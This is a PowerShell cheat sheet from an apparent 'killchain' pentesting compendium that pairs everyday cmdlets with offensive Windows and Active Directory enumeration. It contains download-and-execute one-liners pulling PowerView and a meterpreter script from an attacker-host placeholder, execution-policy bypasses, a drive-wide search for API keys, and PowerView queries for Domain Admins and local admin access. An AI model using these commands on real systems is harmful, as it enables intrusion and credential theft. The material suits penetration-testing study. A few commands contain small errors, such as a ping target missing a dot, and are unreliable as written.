killchain-compendium/Enumeration/Windows/Powershell.md

327 lines
5.9 KiB
Markdown

# Powershell Usage
## Get-Help
```
Get-Help Command-Name
```
* Show examples
```
Get-Help Command-Name -Examples
```
* Get-Command gets all the cmdlets installed on the current Computer.
```
Get-Command
```
```
Get-Command Verb-*
Get-Command Invoke-*
Get-Command Get-*
```
## Passing Output via Pipe
* A pipe passes object including methods and attributes.
```
Verb-Noun | Get-Member
```
```
Get-Command | Get-Member -MemberType Method
```
## Creating Objects from Previous Cmdlets
```
Get-ChildItem | Select-Object -Property Mode, Name
```
* first - gets the first x object
* last - gets the last x object
* unique - shows the unique objects
* skip - skips x objects
## Filtering Objects
```
Verb-Noun | Where-Object -Property PropertyName -operator Value
Verb-Noun | Where-Object {$_.PropertyName -operator Value}
```
The second version uses the $_ operator to iterate through every object passed to the Where-Object cmdlet.
* Where -operator is a list of the following operators:
* -Match: matches the exact value of the property
* -Contains: if any item in the property value is an exact match for the specified value
* -EQ: if the property value is the same as the specified value
* -GT: if the property value is greater than the specified value
### Out-Gridview
Pipe the output to a graphical window and Filter it through the GUI.
```
whatever | Out-GridView
```
## Sort Object
```
Verb-Noun | Sort-Object
```
```
Get-ChildItem | Sort-Object
```
## Finding a File
```
Get-ChildItem -Path C:\ -Recurse -Include *.txt -ErrorAction SilentlyContinue | Where-Object {$_.Name -match 'interesting-file'}
```
```sh
Get-HotFix | Format-list | findstr <searchstring>
```
```sh
Get-ChildItem -Hidden -Recurse -ErrorAction SilentlyContinue
```
* Find backup files
```sh
Get-ChildItem -Path C:\ -Recurse -Include *.bak* -ErroAction SilentlyContinue
```
* Find file contents
```sh
Get-ChildItem -Path C:\* -Recurse | Select-String -pattern API_KEY
```
## Showing File Content
```
Get-Content 'C:\Program Files\interesting-file.txt'
```
* Indexing lines
```sh
(Get-Content -Path file.txt)[index]
```
* Search
```sh
Select-String <filename> -Pattern <pattern>
```
## Copy File Content
```sh
Copy-Item <sourcefile> <destfile>
```
## Count Lines of Output
As an example, count all cmdlets on the system
```
Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object
```
## Count Words
```
Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object -Word
```
## Checksum of File
```
Get-FileHash -Algorithm MD5 'C:\Program Files\interesting-file.txt'
```
## Current Working Directory
```
Get-Location
```
## File Metadata
```sh
ls | Format-List *
```
## Web Request
```sh
Invoke-Webrequest -Uri 'http://<attacker-ip> -OutFile <filename>
```
```sh
(New-Object System.Net.WebClient).DownloadFile("http://example.com/meterpreter.ps1", 'meterpreter.ps1')
```
* Webrequest and execute in one go
```sh
powershell -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://%ATTACKER_IP%/PowerView.ps1'); Get-NetUser | select samaccountname, description"
```
## Base64 Decode File
```
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content .\Desktop\b64.txt)))
```
## **Circumvent Execution-Policy**
```sh
powershell -ExecutionPolicy Bypass -File .\<file>
```
```sh
Set-ExecutionPolicy Bypass -Scope Process
```
## Enumeration
### Users
```
Get-LocalUser
```
* Password not required users
```
Get-LocalUser | Where-Object -Property PasswordRequired -Match false
```
* SID of users
```
Get-WmiObject win32_useraccount | Select name, sid
```
### Network intel
* Connections
```sh
netstat -ano
```
* IP Address
```
Get-NetIpAddress
```
* Listening TCP Ports
```
Get-NetTCPConnection | Where-Object -Property State -Match Listen | measure
```
* TCP Port by number
```
Get-NetTCPConnection | Where-Object -Property LocalPort -Match 443
```
### Patch level and updates
```
Get-Hotfix
```
* Find patch by HotFixID
```
Get-Hotfix | Where-Object -Property HotFixID -Match KB124284
```
```sh
wmic qfe get Caption,Description,HotFixID,InstalledOn
```
### Drivers
```sh
driverquery
```
### Processes
* Start processes
```sh
Start-Process <process>
```
* Running processes
```sh
Get-Process <process>
```
### Scheduled tasks
```sh
schtasks /query /fo LIST /v
```
```sh
Get-ScheduledTaskInfo
```
* Scheduled Tasks, by TaskName
```
Get-ScheduledTask | Where-Object -Property TaskName -Match taskname
```
or
```
Get-ScheduledTask -TaskName taskname
```
### Alternate Data Stream(ADS)
* Show ADS
```sh
Get-Item -Path file.exe -Stream *
```
* Open ADS
```sh
wmic process call create $(Resolve-Path file.exe:streamname)
```
### Export Output
* Export as CSV
```sh
Get-Process <process> | Export-Csv <output.csv>
```
### ACL
* Owner of files
```
Get-ACL C:\
```
### Port Scanner
```
for($i=1; $i -le 65536; $i++) { Test-NetConnection localhost -Port $i}
```
### Ping Hosts
```sh
1..15 | %{echo "10.0.2.$_"; ping -n 1 10.0.2$_ | Select-String ttl}
```
### Antivirus
```sh
sc query windefend
```
* Service name unknown
```sh
sc queryex type=service
```
### Using Powerview
```sh
Import-Module .\powerview.ps1
Get-NetDomainController
(Get-NetUser).name
Get-NetUser -properties description
Get-NetUser | select -ExpandProperty lastlogon
Get-NetComputer -ping
Get-NetGroupMember "Domain Admins"
Find-DomainShare -CheckShareAccess
```
* Enumerate Group Policy
```sh
Get-NetGPO
```
* Trust relationship to other domains
```sh
Get-NetDomainTrust
```
* User enumeration
```sh
Find-LocalAdminAccess
```
```sh
whoami /priv
```
```
Import-Module ActiveDirectory
Get-ADGroup
Get-ADGroupMember
Get-ADPrincipalGroupMembership
```
### Services
List services that are running or stopped but always started automatically
after reboot in the following way.
```sh
Get-Service | Where-Object {$_.State -eq "Running" -and $_.StartType -eq "Automatic"}
Get-Service | Where-Object {$_.State -eq "Stopped" -and $_.StartType -eq "Automatic"}
```